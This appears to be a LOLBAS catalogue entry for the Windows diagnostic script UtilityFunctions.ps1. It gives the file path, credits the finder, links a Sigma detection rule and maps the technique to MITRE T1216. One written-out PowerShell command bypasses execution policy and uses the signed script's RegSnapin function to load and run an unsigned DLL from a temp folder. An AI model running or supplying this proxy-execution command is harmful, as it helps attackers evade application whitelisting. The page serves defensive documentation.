.. / UtilityFunctions.ps1
Star

Execute

PowerShell Diagnostic Script

Paths:

C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1

Resources:

https://twitter.com/nickvangilder/status/1441003666274668546

Acknowledgements:

Nick VanGilder (@nickvangilder)

Detection:

Sigma: https://github.com/SigmaHQ/sigma/blob/0.21-688-gd172b136b/rules/windows/process_creation/proc_creation_win_lolbas_utilityfunctions.yml

Execute

Proxy execute Managed DLL with PowerShell

powershell.exe -ep bypass -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()"

Usecase: Execute proxied payload with Microsoft signed binary
Privileges required: User
OS: Windows 10 21H1 (likely other versions as well), Windows 11
MITRE ATT&CK®: T1216

.. / UtilityFunctions.ps1 Star

Execute

.. / UtilityFunctions.ps1
Star